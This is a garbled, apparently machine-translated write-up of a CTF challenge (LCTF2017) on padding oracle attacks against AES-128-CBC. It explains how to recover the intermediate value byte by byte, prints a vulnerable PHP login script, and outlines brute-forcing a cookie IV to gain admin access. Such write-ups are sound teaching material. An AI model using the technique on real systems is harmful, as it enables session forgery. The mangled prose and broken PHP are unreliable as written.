Padding Oracle Attack

recently in the reappearance LCTF2017 a topic, there is a padding Oracle attack, also is a CBC Flip attack, this attack is mainly for CBC of encryption mode

There are a lot of blog posts about this attack online, but some of the details may be personal, or the author omits it, and I'm going to take a look at the problems I've encountered in this attack.

I've written about it before. CBC Flip Attack article, but the previous article is to know the ciphertext and IV , and as long as the flip of the one can be (flip multi-bit is also possible)

now this padding Oracle attack is done with only the knowledge of IVand nothing else, so I'm going to have a head start around here, and we know that CBC the encryption of the pattern is like this

initially randomly generates an IV andthen xor the first block and IV of the plaintext, and then the first encrypted ciphertext, as IV Make a second block of encryption, and then keep going.

The book "Bag Hat will Web security" Wu Hanqing

It says there is a fixed value that we call Middle, which appears in other articles

This attack is primarily about using this value, and then deriving all the values

Because of the following relationship.

Original Plain ^ original IV = Middle

New Mingwen ^ new IV = Middle

which means we know. Middle, then you can modify the original text, because New Mingwen is our structure.

in the When the CBC mode is decrypted, it can be decrypted from the back, and the number of encryption and decryption bits we have here are all in the same place .

Padding Type

For example, the length of each of our blocks is

If our plaintext is a.

Then the plaintext of the time of the XOR is

aaaaaaaaaaaaaaa0x01

Note that the following 0x01 is a character and is a binary

Similarly, if our plaintext is 8 a

Then the explicit text of the XOR is

aaaaaaaa0x080x080x080x080x080x080x080x08

According to this rule, we can submit some data to the server, then let the server automatically decrypt, if can decrypt, that is the last one or several padding value.

This process is like a blind SQL injection

For example, we know that we can control tokens( that is, IV), other parameters are unknown,

when we submit token , the program will be automatically decrypted, there are 3 cases:

1, token length is not correct, unable to decrypt, the server will error notification

2, token can be decrypted, but the solution is not the original plaintext

3. Token is completely correct and the correct clear text appears

according to the above points, we can use, as long as we judge the server is not wrong, the program can be decrypted, that is the last one or several are right, then you can know our virtual out of the IV value, with our virtual out of the plaintext, you can get the right Middle (Because Middle is constant, each session of the Middle is the same)

For example: Middle unknown, clear text unknown,IV controllable (both are in the system)

Because middle[15] = Clear Text [15]^iv[15]

we need to know. Middle value, our virtual Middle is only the length of a bit, and the last one must be 0x01 ,

Middle do not need to know, because it is inside the server, we just input IV, the decryption function will be automatically called, if we enter the value of IV is 00000000000000000000000000000065

then we'll know. The last value of Middle, which is middle[15] = (0x65) ^ (0x01), the value is fixed.

next middle[14] We assume clear text as long as 14 0x020x02 16 binary, because the plaintext has changed, then the corresponding iv iv iv padding The value of iv iv[15] = middle[15]^ (0x02)

IV The second value is what we want to get, continue in the way above, the second value of blasting, as long as the server is not wrong, can decrypt that is correct, get the second value, that is , the second value of Middle , repeat the above steps , we can get all the middle .

But our plaintext can't be null, so at least the first bit of the plaintext we're going to guess is that Middle The first place, we can only get through the blasting.

got a Middle , if we're going to decrypt the original text to the data we want,

That's according to the formula

Original Plain ^ original IV = Middle

New Mingwen ^ new IV = Middle

original Clear Text = New Mingwen ^ new iv^ original IV

We just need to enter the new IV, the solution is a new clear text, but also the new plaintext we construct.

Here is an example combined with code detailed analysis:

<?php
error_reporting (0);
Define ("Secret_key", "******"); Key is not known
Define ("METHOD", "AES-128-CBC");
Session_Start ();

functionGet_random_token () {
$random _token = ";
$str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890";
for($i = 0; $i < $i + +) {
$random _token. = substr ($str, rand (1, 61), 1);
}
return$random _token;
}

functionGet_identity () {
$id = ' * * * '; The original text is not known
$token = Get_random_token ();
$c = Openssl_encrypt ($id,METHOD,Secret_key,Openssl_raw_data, $token);
$_session[' id '] = base64_encode ($c);
Setcookie ("token", Base64_encode ($token));
$_session[' isadmin '] =false;
}
functionTest_identity () {
if(isset($_session[' id ')) {
$c = Base64_decode ($_session[' id ");
$token = Base64_decode ($_cookie["token"]);
if($u = Openssl_decrypt ($c,METHOD,Secret_key,Openssl_raw_data, $token)) {
if($u = = = ' Admin ') {
$_session[' isadmin '] =true;
}
}Else
Echo"Error!";
}
}
if(!isset($_session[' id '))
Get_identity ();
Test_identity ();
if($_session["ISAdmin"])
Echo"You are admin!";
Else
Echo"False";
?>

(

This example is to take

http://f1sh.site/2017/08/04/%E5%88%9D%E5%AD%A6padding-oracle-attack/ of the

）

The source of the approximate process is

1, get_identity ();

generate a token and then encrypt the plaintext as the IV of the cryptographic algorithm, where the plaintext is unknown, and then the Set-cookie

2, test_identity ();

to decrypt and then determine what the clear text is, and if it is admin, set

$_session[' isadmin ') = true;

3,if ($_session["ISAdmin"])

If it is correct, then the output You are admin

Otherwise the output is False

Here we can know that the value of token is controllable, according to our analysis above, we can control token (that is, iv) so that the solution of arbitrary plaintext

Follow the above process and go through it.

Python Code writing

Get it first.

PHPSESSID and Token values

then construct token to send to the server

First , we construct the 0, and the last one is blasting

get our structure. the last one of the IV,3e, and then the corresponding middle value is

then continue to the second value by writing down the value of middle.

we're going to construct a 0, and the penultimate one is a demolition, and the last can be counted.

Then continue to run the code

can see the page has been displayed as false, no Error, that is,you can know the Middle of the second two, in turn, you can get what we want to know after level Middle

Complete code run out of the results

use the same session and token access in the browser

You can see that it's been successfully logged in.

The detailed code can refer to my Github:https://github.com/niechaojun/padding_oracle

Padding Oracle Attack